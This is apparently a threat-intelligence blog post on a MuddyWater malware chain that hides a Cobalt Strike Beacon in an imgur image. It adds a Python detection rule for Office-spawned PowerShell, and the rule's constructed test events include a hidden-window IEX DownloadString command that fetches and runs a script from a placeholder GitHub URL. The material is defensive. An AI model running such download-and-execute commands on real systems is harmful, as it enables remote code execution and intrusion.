A new sample associated with MuddyWater, an Advanced Persistent Threat (APT) group known to target organizations in Middle Eastern countries, has been discovered using steganography and a script hosted on GitHub as part of its malware infection chain. According to Bleeping Computer, the attack begins with a malicious Word document whose macro code pulls a PowerShell script hosted on GitHub and executes it to start the steganography stage. That PowerShell script downloads a PNG image from the legitimate image-hosting site imgur.com and runs multiple math operations against the image's pixel values to decode a Cobalt Strike Beacon, a legitimate red team tool that has also been used extensively by threat actors. Once the PNG is decoded, a further PowerShell script loads the resulting shellcode into memory and executes the Beacon, giving the attackers remote access to the target machine.
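As an added example (not from the article or from Binary Defense), the following Python correlation rule runs over constructed Sysmon-style process-creation (ID 1) and DNS-query (ID 22) events: it flags PowerShell spawned by an Office application whose command line fetches a script from GitHub, and raises the severity when that same process then resolves imgur.com, which are the two externally observable stages of the chain described above. The event shape, PIDs, paths and URLs are constructed assumptions, not indicators from the sample.

```python
# Constructed Sysmon-style events (ID 1 = process create, ID 22 = DNS query); not real telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
SAMPLE_EVENTS = [
    {"event_id": 1, "pid": 4120, "image": PS, "parent_image": WORD,
     "cmdline": "powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString("
                "'https://raw.githubusercontent.com/EXAMPLE-PLACEHOLDER/repo/main/stage.ps1')"},
    {"event_id": 22, "pid": 4120, "image": PS, "query": "i.imgur.com"},
    {"event_id": 1, "pid": 6010, "image": PS, "parent_image": WORD,
     "cmdline": "powershell -c (New-Object Net.WebClient).DownloadString("
                "'https://gist.github.com/EXAMPLE-PLACEHOLDER')"},
    # Benign: a scheduled script run from Explorer that happens to touch imgur; must NOT fire.
    {"event_id": 1, "pid": 7000, "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell -File C:\Scripts\nightly-backup.ps1"},
    {"event_id": 22, "pid": 7000, "image": PS, "query": "i.imgur.com"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = ("raw.githubusercontent.com", "gist.github.com", "github.com")
IMAGE_HOSTS = ("imgur.com",)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_suspicious_chains(events):
    """Correlate by PID: stage 1 = Office -> PowerShell pulling a script from GitHub
    (medium); stage 2 = the same PowerShell process resolving an image host (high).
    Returns one finding per PowerShell PID, in order of first sighting."""
    findings = {}
    for e in events:  # stage 1: parent/child relationship plus script host in the command line
        if e["event_id"] != 1 or _basename(e["image"]) != "powershell.exe":
            continue
        if _basename(e["parent_image"]) not in OFFICE_PARENTS:
            continue
        cmd = e["cmdline"].lower()
        hit = next((h for h in SCRIPT_HOSTS if h in cmd), None)
        if hit:
            findings[e["pid"]] = {"pid": e["pid"], "parent": _basename(e["parent_image"]),
                                  "script_host": hit, "image_host_dns": None, "severity": "medium"}
    for e in events:  # stage 2: only escalate PIDs already implicated by stage 1
        if e["event_id"] == 22 and e["pid"] in findings:
            q = e["query"].lower()
            if any(q == h or q.endswith("." + h) for h in IMAGE_HOSTS):
                findings[e["pid"]].update(image_host_dns=q, severity="high")
    return list(findings.values())
```

Keying on the Office-to-PowerShell parent/child relationship is what carries the detection; the host lists are easy for an operator to change and only serve to rank the finding.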
Written by: Nataliia Zdrok, Threat Intelligence Analyst at Binary Defense

Russia’s invasion of Ukraine increased